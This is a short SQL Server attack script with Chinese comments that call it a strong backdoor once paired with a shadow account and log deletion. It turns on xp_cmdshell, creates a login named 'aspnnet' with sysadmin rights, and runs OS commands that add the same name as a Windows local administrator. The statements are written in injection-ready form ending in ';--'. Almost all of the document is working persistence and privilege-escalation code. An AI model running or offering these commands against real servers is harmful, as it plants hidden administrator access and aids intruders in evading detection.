--攻与防,矛与盾
--sql server 2005上测试成功的。再加上影子账户及删除日志。那就是很强的后门了。
--enabble xp_cmdshell
EXEC sys.sp_configure N'show advanced options', N'1'
go
EXEC sys.sp_configure N'xp_cmdshell', N'1'
go
RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'show advanced options', N'0'
go
-- Unenable xp_cmdshell
EXEC sys.sp_configure N'show advanced options', N'1'
go
EXEC sys.sp_configure N'xp_cmdshell', N'0'
go
RECONFIGURE WITH OVERRIDE
go
EXEC sys.sp_configure N'show advanced options', N'0'
go
exec master.dbo.sp_addlogin aspnnet;--
exec master.dbo.sp_password null,aspnnet,aspnnet;--
exec master.dbo.sp_addsrvrolemember aspnnet,sysadmin;--
exec master.dbo.xp_cmdshell 'net user aspnnet aspnnet /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
exec master.dbo.xp_cmdshell 'net localgroup administrators aspnnet /add';--